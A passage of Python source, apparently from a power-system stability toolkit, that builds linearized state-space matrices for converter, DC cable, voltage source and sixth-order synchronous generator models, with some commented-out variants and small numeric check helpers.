# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1/cpr.Vref],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
# [vd/cpr.Tpm, vq/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0, 0],
# [vq/cpr.Tpm, -vd/cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tpm, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1/cpr.Tvm],
# ])
Ac = np.array([[cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, cpr.wn * (
cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) - cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0, 0,
cpr.wn * (Iq * cpr.Ki_pll * cpr.Lt - Iq * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0,
cpr.Kip * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0, 0, 0,
cpr.Kpc * cpr.Kpp * cpr.wn / (cpr.Lt * cpr.Vref * vdc)],
[cpr.wn * (-cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + cpr.Lt * (
Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) / vdc) / cpr.Lt,
cpr.wn * (-cpr.Kpc / vdc - cpr.Rt) / cpr.Lt, 0, 0, cpr.Kic * cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn / (cpr.Lt * vdc), 0,
cpr.wn * (-Id * cpr.Ki_pll * cpr.Lt + Id * cpr.Ki_pll * cpr.Lt / vdc) / cpr.Lt, 0, 0,
cpr.Kiq * cpr.Kpc * cpr.wn / (cpr.Lt * vdc), 0, cpr.Kpc * cpr.Kpq * cpr.wn / (cpr.Lt * vdc), 0],
[cpr.wn * vd / (cpr.Ldc * vdc), cpr.wn * vq / (cpr.Ldc * vdc), -cpr.wn / cpr.Ldc, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kip, 0, 0, 0, cpr.Kpp / cpr.Vref],
[0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, cpr.Kiq, 0, cpr.Kpq, 0],
[0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / cpr.Tad, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, cpr.Ki_pll * cpr.wn, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, -cpr.Ki_pll, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1 / cpr.Vref],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],
[vd / cpr.Tpm, vq / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0, 0],
[vq / cpr.Tpm, -vd / cpr.Tpm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tpm, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1 / cpr.Tvm],
])
# Bvc = np.array([[-cpr.wn/cpr.Lt, cpr.wn*(Iq*cpr.Kp_pll*cpr.Lt - Iq*cpr.Kp_pll*cpr.Lt/vdc)/cpr.Lt, -cpr.wn*(-Iq*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madd + Md*cpr.Kic + cpr.Kpc*(-Id + Xp*cpr.Kip + cpr.Kpp*(Vm/cpr.Vref - 1)))/(cpr.Lt*vdc**2)],
# [0, cpr.wn*(-Id*cpr.Kp_pll*cpr.Lt + Id*cpr.Kp_pll*cpr.Lt/vdc - 1)/cpr.Lt, -cpr.wn*(Id*cpr.Lt*(Xpll*cpr.Ki_pll + cpr.Kp_pll*vq) + Madq + Mq*cpr.Kic + cpr.Kpc*(-Iq + Xq*cpr.Kiq + cpr.Kpq*(Qm - cpr.Qref)))/(cpr.Lt*vdc**2)],
# [0, 0, 0],
# [0, 0, 0],
# [1/cpr.Tad, 0, 0],
# [0, 1/cpr.Tad, 0],
# [0, cpr.Kp_pll*cpr.wn, 0],
# [0, 1, 0],
# [0, -cpr.Kp_pll, 0],
# [0, 0, 0],
# [0, 0, 0],
# [Id/cpr.Tpm, Iq/cpr.Tpm, 0],
# [-Iq/cpr.Tpm, Id/cpr.Tpm, 0],
# [0, 0, 1/cpr.Tvm],
# ])
Bvac = np.array([[-cpr.wn / cpr.Lt, cpr.wn * (Iq * cpr.Kp_pll * cpr.Lt - Iq * cpr.Kp_pll * cpr.Lt / vdc) / cpr.Lt],
[0, cpr.wn * (-Id * cpr.Kp_pll * cpr.Lt + Id * cpr.Kp_pll * cpr.Lt / vdc - 1) / cpr.Lt],
[Id * cpr.wn / (cpr.Ldc * vdc), Iq * cpr.wn / (cpr.Ldc * vdc)],
[0, 0],
[0, 0],
[1 / cpr.Tad, 0],
[0, 1 / cpr.Tad],
[0, cpr.Kp_pll * cpr.wn],
[0, 1],
[0, -cpr.Kp_pll],
[0, 0],
[0, 0],
[Id / cpr.Tpm, Iq / cpr.Tpm],
[-Iq / cpr.Tpm, Id / cpr.Tpm],
[0, 0],
])
Bvdc = np.array([[-cpr.wn * (
-Iq * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madd + Md * cpr.Kic + cpr.Kpc * (
-Id + Xp * cpr.Kip + cpr.Kpp * (Vm / cpr.Vref - 1))) / (cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * cpr.Lt * (Xpll * cpr.Ki_pll + cpr.Kp_pll * vq) + Madq + Mq * cpr.Kic + cpr.Kpc * (
-Iq + Xq * cpr.Kiq + cpr.Kpq * (Qm - cpr.Qref))) / (cpr.Lt * vdc ** 2)],
[-cpr.wn * (Id * vd + Iq * vq) / (cpr.Ldc * vdc ** 2)],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[1 / cpr.Tvm],
])
Tc = np.array([[np.cos(theta), np.sin(theta)],
[-np.sin(theta), np.cos(theta)]])
Rvc = np.zeros((2, cpr.nx))
Rvc[0, cpr.x_idx['Theta']] = vq
Rvc[1, cpr.x_idx['Theta']] = -vd
Pc = np.zeros((2, cpr.nx))
Pc[0, cpr.x_idx['Id']] = 1
Pc[1, cpr.x_idx['Iq']] = 1
Pc[0, cpr.x_idx['Theta']] = -Iq
Pc[1, cpr.x_idx['Theta']] = Id
Cc = Tc.T @ Pc
Cdc = np.zeros((1, cpr.nx))
Cdc[0, cpr.x_idx['Idc']] = 1
Dc = np.zeros((2, 2))
A = Ac + Bvac @ Rvc
B = Bvac @ Tc
C = Cc * cpr.Sn / cpr.Sb
D = Dc
return A, B, Bvdc, C, Cdc, D
def dc_cable_linear(x0, u0, lpr):
A = np.array([[-lpr.R * lpr.wn / lpr.L, lpr.wn / lpr.L, -lpr.wn / lpr.L],
[-2 * lpr.wn / lpr.C, -lpr.G * lpr.wn / lpr.C, 0],
[2 * lpr.wn / lpr.C, 0, -lpr.G * lpr.wn / lpr.C],
])
B = np.array([[0, 0],
[2 * lpr.wn / lpr.C, 0],
[0, -2 * lpr.wn / lpr.C],
])
C = np.zeros((1, lpr.nx))
D = np.zeros((1, 2))
return A, B, C, D
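# A hedged usage sketch (x0, u0, lpr are supplied by the calling code):
# once a linearized A matrix is assembled, the damping screen defined
# earlier applies directly:
#   A, B, C, D = dc_cable_linear(x0, u0, lpr)
#   damping, worst = compute_damping_ratio(np.linalg.eigvals(A))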
def vs_linear(x0, u0, vspr):
phi = x0[vspr.x_idx['phi']]
Ix = x0[vspr.x_idx['Ix']]
Iy = x0[vspr.x_idx['Iy']]
Vx = u0[0]
Vy = u0[1]
Ex = vspr.V0 * np.cos(phi)
Ey = vspr.V0 * np.sin(phi)
# A = np.array([[-1 + (Ex/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy) + vspr.V0*(Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)*np.sin(phi)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)/(1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2), (vspr.R/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy) + (vspr.L + vspr.R)*(Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)/(1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2), (vspr.R*(Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2 + (-vspr.L - vspr.R)/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy))/(1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)],
# [0, -vspr.R*vspr.wn/vspr.L, vspr.wn],
# [0, -vspr.wn, -vspr.R*vspr.wn/vspr.L],
# ])
A = np.array([[-1 + ((Ey - Ex) * (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2 + (Ey + Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex)) / (
1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2), (
vspr.R / (-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) + (
vspr.R + vspr.X) * (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2) / (
1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2), (
vspr.R * (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2 + (
-vspr.R - vspr.X) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex)) / (
1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2)],
[-Ey * vspr.wn / vspr.X, -vspr.R * vspr.wn / vspr.X, vspr.wn],
[Ex * vspr.wn / vspr.X, -vspr.wn, -vspr.R * vspr.wn / vspr.X],
])
# B = np.array([[1/((1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)*(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)), (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)/((1 + (Ix*vspr.R - Iy*vspr.L - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)*(-Ix*vspr.L - Ix*vspr.R - Iy*vspr.R - Vy + vspr.V0*np.cos(phi) + vspr.Vy)**2)],
# [-vspr.wn/vspr.L, 0],
# [0, -vspr.wn/vspr.L],
# ])
B = np.array([[1 / ((1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex)),
(Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) / ((1 + (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - Ex) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ey + Ex) ** 2)],
[-vspr.wn / vspr.X, 0],
[0, -vspr.wn / vspr.X],
])
C = np.zeros((2, vspr.nx))
C[0, vspr.x_idx['Ix']] = 1
C[1, vspr.x_idx['Iy']] = 1
D = np.zeros((2, 2))
return A, B, C, D
def vs_linear2(x0, u0, vspr):
phi = x0[vspr.x_idx['phi']]
# Ix = x0[vspr.x_idx['Ix']]
# Iy = x0[vspr.x_idx['Iy']]
Vx = u0[0]
Vy = u0[1]
Ex = vspr.V0 * np.cos(phi)
Ey = vspr.V0 * np.sin(phi)
Ix = (-vspr.R * (Vx - Ex) - vspr.X * (Vy - Ey)) / (vspr.R ** 2 + vspr.X ** 2)
Iy = (vspr.X * (Vx - Ex) - vspr.R * (Vy - Ey)) / (vspr.R ** 2 + vspr.X ** 2)
# ####
# phi = np.deg2rad(10)
# d = np.deg2rad(3)
# theta = np.deg2rad(85)
# E = 1.1*np.exp(1j*phi)
# V = 1.05*np.exp(1j*d)
# Z = 0.15*np.exp(1j*theta)
# I = (E-V)/Z
# (abs(E)*np.cos(phi-theta)-abs(V)*np.cos(d-theta))/abs(Z)
# (abs(E)*np.sin(phi-theta)-abs(V)*np.sin(d-theta))/abs(Z)
# (E.real*(1/Z).real-E.imag*(1/Z).imag
# -V.real*(1/Z).real+V.imag*(1/Z).imag)
# np.cos(-theta)/abs(Z)
# (1/Z).real
# r=Z.real
# x = Z.imag
# Ix = I.real
# Iy = I.imag
# Ex = E.real
# Ey = E.imag
# Ex-r*Ix+x*Iy
# Ey-r*Iy-x*Ix
# Zmat = np.array([[-Z.real,Z.imag],
# [-Z.imag,-Z.real]])
# Zmat_inv = np.linalg.inv(Zmat)
# I2 = Zmat_inv@np.array([Vx-Ex,Vy-Ey])
# I2 = Zmat_inv@np.array([Vx,Vy])-Zmat_inv@np.array([Ex,Ey])
# # Iq = (gpr.xdpp*(Vd-Edpp)-gpr.ra*(Vq-Eqpp))/(gpr.ra**2+gpr.xqpp*gpr.xdpp)
# Ix,Iy = vspr.Zvs_inv@np.array([vspr.V0*np.cos(phi)-Vx,vspr.V0*np.sin(phi)-Vy])
# TODO this might be nicer with dq transformation
# A = np.array([-1 + (Ex/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy) + vspr.V0*(Ix*vspr.R - Iy*vspr.X - Iy*vspr.R + Vx + Ey - vspr.Vx)*np.sin(phi)/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)/(1 + (Ix*vspr.R - Iy*vspr.X - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)])
A = np.array([[-1 + (vspr.V0 * np.cos(phi) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + vspr.V0 * np.cos(phi) + vspr.Vy) + vspr.V0 * (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + vspr.V0 * np.sin(
phi) - vspr.Vx) * np.sin(phi) / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + vspr.V0 * np.cos(
phi) + vspr.Vy) ** 2) / (1 + (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + vspr.V0 * np.sin(phi) - vspr.Vx) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + vspr.V0 * np.cos(
phi) + vspr.Vy) ** 2)],
])
# B = np.array([1/((1 + (Ix*vspr.R - Iy*vspr.X - Iy*vspr.R + Vx + Ey - vspr.Vx)**2/(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy)**2)*(-Ix*vspr.X - Ix*vspr.R - Iy*vspr.R - Vy + Ex + vspr.Vy))])
B = np.array([[1 / ((1 + (Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - vspr.Vx) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy)),
(Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - vspr.Vx) / ((1 + (
Ix * vspr.R - Iy * vspr.R - Iy * vspr.X + Vx + Ey - vspr.Vx) ** 2 / (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy) ** 2) * (
-Ix * vspr.R - Ix * vspr.X - Iy * vspr.R - Vy + Ex + vspr.Vy) ** 2)]])
C = -vspr.Zvs_inv @ np.array([[Ex], [Ey]])
D = vspr.Zvs_inv
return A, B, C, D
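# Cross-check of the steady-state current used above (formalizing the phasor
# scratch notes in the comments): the (R, X) solution for (Ix, Iy) should equal
# the complex solution I = (E - V)/(R + jX). All numbers are hypothetical.
def _check_vs_current_solution(R=0.01, X=0.15, E=1.1 + 0.1j, V=1.05 + 0.02j):
    import numpy as np
    Ex, Ey, Vx, Vy = E.real, E.imag, V.real, V.imag
    Ix = (-R * (Vx - Ex) - X * (Vy - Ey)) / (R ** 2 + X ** 2)
    Iy = (X * (Vx - Ex) - R * (Vy - Ey)) / (R ** 2 + X ** 2)
    I = (E - V) / (R + 1j * X)
    return np.allclose([Ix, Iy], [I.real, I.imag])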
def sixth_order_model(x0, u0, gpr):
delta = x0[gpr.x_idx['d']] + np.pi / 2 # XXX delta is shifted 90 degrees due to different dq transformation
e_qpp = x0[gpr.x_idx['Eqpp']]
e_dpp = x0[gpr.x_idx['Edpp']]
v_d = u0[0][0]
v_q = u0[1][0]
i_d, i_q = gpr.Zg_inv @ np.array([v_d - e_dpp, v_q - e_qpp])
Ag_bar = np.array([[0, gpr.wn, 0, 0, 0, 0],
[0, -gpr.D / gpr.Tj, 0, -i_q / gpr.Tj, 0, -i_d / gpr.Tj],
[0, 0, -gpr.kd / gpr.Tdp, (gpr.kd - 1) / gpr.Tdp, 0, 0],
[0, 0, 1 / gpr.Tdpp, -1 / gpr.Tdpp, 0, 0],
[0, 0, 0, 0, -gpr.kq / gpr.Tqp, (gpr.kq - 1) / gpr.Tqp],
[0, 0, 0, 0, 1 / gpr.Tqpp, -1 / gpr.Tqpp]])
Big_bar = np.array([[0, 0],
[((gpr.xdpp - gpr.xqpp) * i_q - e_dpp) / gpr.Tj,
((gpr.xdpp - gpr.xqpp) * i_d - e_qpp) / gpr.Tj],
                        [1.1 / gpr.Tdp, 0],  # XXX hard-coded gain; cf. (-gpr.xd + gpr.xdp)/gpr.Tdp in sixth_order_model_avr
[(gpr.xdpp - gpr.xdp) / gpr.Tdpp, 0],
[0, 0],
[0, (gpr.xqp - gpr.xqpp) / gpr.Tqpp]])
Bvg_bar = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0]])
Pg_bar = np.array([[0, 0, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0]])
Zg_bar = np.array([[-gpr.ra, gpr.xqpp],
[-gpr.xdpp, -gpr.ra]])
Tg0 = np.array([[np.sin(delta), -np.cos(delta)],
[np.cos(delta), np.sin(delta)]])
Rvg = np.array([[v_q, 0, 0, 0, 0, 0],
[-v_d, 0, 0, 0, 0, 0]])
Rig = np.array([[i_q, 0, 0, 0, 0, 0],
[-i_d, 0, 0, 0, 0, 0]])
Cg = Tg0.T @ (np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) - Rig)
Dg = Tg0.T @ np.linalg.inv(Zg_bar) @ Tg0
Ag = Ag_bar + Big_bar @ np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) + Bvg_bar @ Rvg
Bg = (Big_bar @ np.linalg.inv(Zg_bar) + Bvg_bar) @ Tg0
return Ag, Bg, Cg, Dg
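# The Zg_inv solve above implements the stator algebraic equation
# Zg_bar @ [i_d, i_q] = [v_d - e_dpp, v_q - e_qpp] with
# Zg_bar = [[-ra, xqpp], [-xdpp, -ra]]. Quick numeric illustration with
# hypothetical machine constants:
def _check_stator_algebraic(ra=0.003, xdpp=0.2, xqpp=0.25,
                            e_dpp=0.1, e_qpp=1.0, v_d=0.05, v_q=0.98):
    import numpy as np
    Zg_bar = np.array([[-ra, xqpp],
                       [-xdpp, -ra]])
    rhs = np.array([v_d - e_dpp, v_q - e_qpp])
    i_dq = np.linalg.solve(Zg_bar, rhs)  # same as Zg_inv @ rhs
    return np.allclose(Zg_bar @ i_dq, rhs)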
def sixth_order_model_avr_(x0, u0, gpr):
delta = x0[gpr.x_idx['d']] + np.pi / 2 # XXX delta is shifted 90 degrees due to different dq transformation
e_qpp = x0[gpr.x_idx['Eqpp']]
e_dpp = x0[gpr.x_idx['Edpp']]
v_d = u0[0] # [0]
v_q = u0[1] # [0]
i_d, i_q = gpr.Zg_inv @ np.array([v_d - e_dpp, v_q - e_qpp])
Ag_bar = np.array([[0, gpr.wn, 0, 0, 0, 0, 0, 0, 0],
[0, -gpr.D / gpr.Tj, 0, -i_q / gpr.Tj, 0, -i_d / gpr.Tj, 0, 0, 0],
[0, 0, -gpr.kd / gpr.Tdp, (gpr.kd - 1) / gpr.Tdp, 0, 0, 1 / gpr.Tdp, 0, 0],
[0, 0, 1 / gpr.Tdpp, -1 / gpr.Tdpp, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.kq / gpr.Tqp, (gpr.kq - 1) / gpr.Tqp, 0, 0, 0],
[0, 0, 0, 0, 1 / gpr.Tqpp, -1 / gpr.Tqpp, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te)],
[0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0],
[0, 0, 0, 0, 0, 0, 0, -1, 0],
])
Big_bar = np.array([[0, 0],
[(-e_dpp + gpr.xdpp * i_q - gpr.xqpp * i_q) / gpr.Tj,
(-e_qpp + gpr.xdpp * i_d - gpr.xqpp * i_d) / gpr.Tj],
[0, 0],
[(-gpr.xdp + gpr.xdpp) / gpr.Tdpp, 0],
[0, 0],
[0, (gpr.xqp - gpr.xqpp) / gpr.Tqpp],
[0, 0],
[0, 0],
[0, 0],
])
Bvg_bar = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[v_d / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2)), v_q / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2))],
[0, 0],
])
Pg_bar = np.array([[0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0]])
Zg_bar = np.array([[-gpr.ra, gpr.xqpp],
[-gpr.xdpp, -gpr.ra]])
Tg0 = np.array([[np.sin(delta), -np.cos(delta)],
[np.cos(delta), np.sin(delta)]])
Rvg = np.array([[v_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-v_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Rig = np.array([[i_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-i_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Cg = (Tg0.T @ (np.linalg.inv(Zg_bar) @ (
Rvg - Pg_bar) - Rig)) * gpr.Sn / gpr.Sb # TODO move *gpr.Sn/gpr.Sb outside of this function
Dg = (Tg0.T @ np.linalg.inv(Zg_bar) @ Tg0) * gpr.Sn / gpr.Sb
Ag = Ag_bar + Big_bar @ np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) + Bvg_bar @ Rvg
Bg = (Big_bar @ np.linalg.inv(Zg_bar) + Bvg_bar) @ Tg0
return Ag, Bg, Cg, Dg
def sixth_order_model_avr(x0, u0, gpr):
delta = x0[gpr.x_idx['d']] + np.pi / 2 # XXX delta is shifted 90 degrees due to different dq transformation
e_qpp = x0[gpr.x_idx['Eqpp']]
e_dpp = x0[gpr.x_idx['Edpp']]
v_d = u0[0] # [0]
v_q = u0[1] # [0]
i_d, i_q = gpr.Zg_inv @ np.array([v_d - e_dpp, v_q - e_qpp])
Ag_bar = np.array([[0, gpr.wn, 0, 0, 0, 0, 0, 0, 0],
[0, -gpr.D / gpr.Tj, 0, -i_q / gpr.Tj, 0, -i_d / gpr.Tj, 0, 0, 0],
[0, 0, -1 / gpr.Tdp, 0, 0, 0, 1 / gpr.Tdp, 0, 0],
[0, 0, 1 / gpr.Tdpp, -1 / gpr.Tdpp, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1 / gpr.Tqp, 0, 0, 0, 0],
[0, 0, 0, 0, 1 / gpr.Tqpp, -1 / gpr.Tqpp, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te)],
[0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0],
[0, 0, 0, 0, 0, 0, 0, -1, 0],
])
Big_bar = np.array([[0, 0],
[(-e_dpp + gpr.xdpp * i_q - gpr.xqpp * i_q) / gpr.Tj,
(-e_qpp + gpr.xdpp * i_d - gpr.xqpp * i_d) / gpr.Tj],
[(-gpr.xd + gpr.xdp) / gpr.Tdp, 0],
[(-gpr.xdp + gpr.xdpp) / gpr.Tdpp, 0],
[0, (gpr.xq - gpr.xqp) / gpr.Tqp],
[0, (gpr.xqp - gpr.xqpp) / gpr.Tqpp],
[0, 0],
[0, 0],
[0, 0],
])
Bvg_bar = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[v_d / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2)), v_q / (gpr.Tm * np.sqrt(v_d ** 2 + v_q ** 2))],
[0, 0],
])
Pg_bar = np.array([[0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0]])
Zg_bar = np.array([[-gpr.ra, gpr.xqpp],
[-gpr.xdpp, -gpr.ra]])
Tg0 = np.array([[np.sin(delta), -np.cos(delta)],
[np.cos(delta), np.sin(delta)]])
Rvg = np.array([[v_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-v_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Rig = np.array([[i_q, 0, 0, 0, 0, 0, 0, 0, 0],
[-i_d, 0, 0, 0, 0, 0, 0, 0, 0]])
Cg = (Tg0.T @ (np.linalg.inv(Zg_bar) @ (
Rvg - Pg_bar) - Rig)) * gpr.Sn / gpr.Sb # TODO move *gpr.Sn/gpr.Sb outside of this function
Dg = (Tg0.T @ np.linalg.inv(Zg_bar) @ Tg0) * gpr.Sn / gpr.Sb
Ag = Ag_bar + Big_bar @ np.linalg.inv(Zg_bar) @ (Rvg - Pg_bar) + Bvg_bar @ Rvg
Bg = (Big_bar @ np.linalg.inv(Zg_bar) + Bvg_bar) @ Tg0
return Ag, Bg, Cg, Dg
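# Note on the two AVR variants: sixth_order_model_avr_ keeps the kd/kq
# flux-coupling form of the E'' equations, while sixth_order_model_avr uses the
# classical (xd - xdp)/(xq - xqp) ladder form in Big_bar; both share the same
# three exciter/measurement states (last three rows of Ag_bar).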
def standard_model_linear(xo, uo, gpr):
delta = xo[gpr.x_idx['d']]
w = xo[gpr.x_idx['w']]
i_d = xo[gpr.x_idx['Id']]
i_q = xo[gpr.x_idx['Iq']]
psi_d = xo[gpr.x_idx['psi_d']]
psi_q = xo[gpr.x_idx['psi_q']]
psi_fd = xo[gpr.x_idx['psi_fd']]
psi_1d = xo[gpr.x_idx['psi_1d']]
psi_2q = xo[gpr.x_idx['psi_2q']]
psi_1q = xo[gpr.x_idx['psi_1q']]
Vd = uo[0]
Vq = uo[1]
Ag = np.array([[0, gpr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, (-gpr.dkd - gpr.dpe / w + gpr.dpe * (w - 1) / w ** 2) / gpr.Tj, -i_q / (gpr.Tj * gpr.cosn),
